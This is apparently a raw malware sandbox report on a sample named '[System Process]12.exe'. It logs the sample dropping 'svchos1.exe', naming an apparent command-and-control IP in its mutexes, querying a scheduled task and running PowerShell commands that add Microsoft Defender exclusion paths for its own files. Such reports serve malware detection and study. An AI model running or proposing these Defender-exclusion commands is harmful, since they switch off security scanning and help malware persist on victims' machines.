Code function: 28_2_016F15C0 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,Process32NextW,CloseHandle,CloseHandle,

28_2_016F15C0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_00286C20 CoInitialize,CoCreateInstance,

28_2_00286C20

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0027603C __EH_prolog3_catch,FindResourceW,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,

28_2_0027603C

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0384F0E0 Sleep,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,

28_2_0384F0E0

Source: C:\Users\user\Desktop\[System Process]12.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\3[1].txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Users\user\Desktop\[System Process]12.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.218.113.210:443:MyService1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
Source: C:\Users\user\Desktop\[System Process]12.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.218.113.210:8080:MyService
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a3qfobu.n1x.ps1

Source: [System Process]12.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\[System Process]12.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: [System Process]12.exe	Virustotal: Detection: 52%
Source: [System Process]12.exe	ReversingLabs: Detection: 42%

Source: [System Process]12.exe	String found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al
Source: [System Process]12.exe	String found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al

Source: C:\Users\user\Desktop\[System Process]12.exe

File read: C:\Users\user\Desktop\[System Process]12.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\[System Process]12.exe "C:\Users\user\Desktop\[System Process]12.exe"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Users\user\Desktop\[System Process]12.exe "C:\Users\user\Desktop\[System Process]12.exe"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Documents\MM\svchos1.exe C:\Users\Public\Documents\MM\svchos1.exe
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Users\Public\Documents\MM\svchos1.exe "C:\Users\Public\Documents\MM\svchos1.exe"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Users\user\Desktop\[System Process]12.exe "C:\Users\user\Desktop\[System Process]12.exe"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
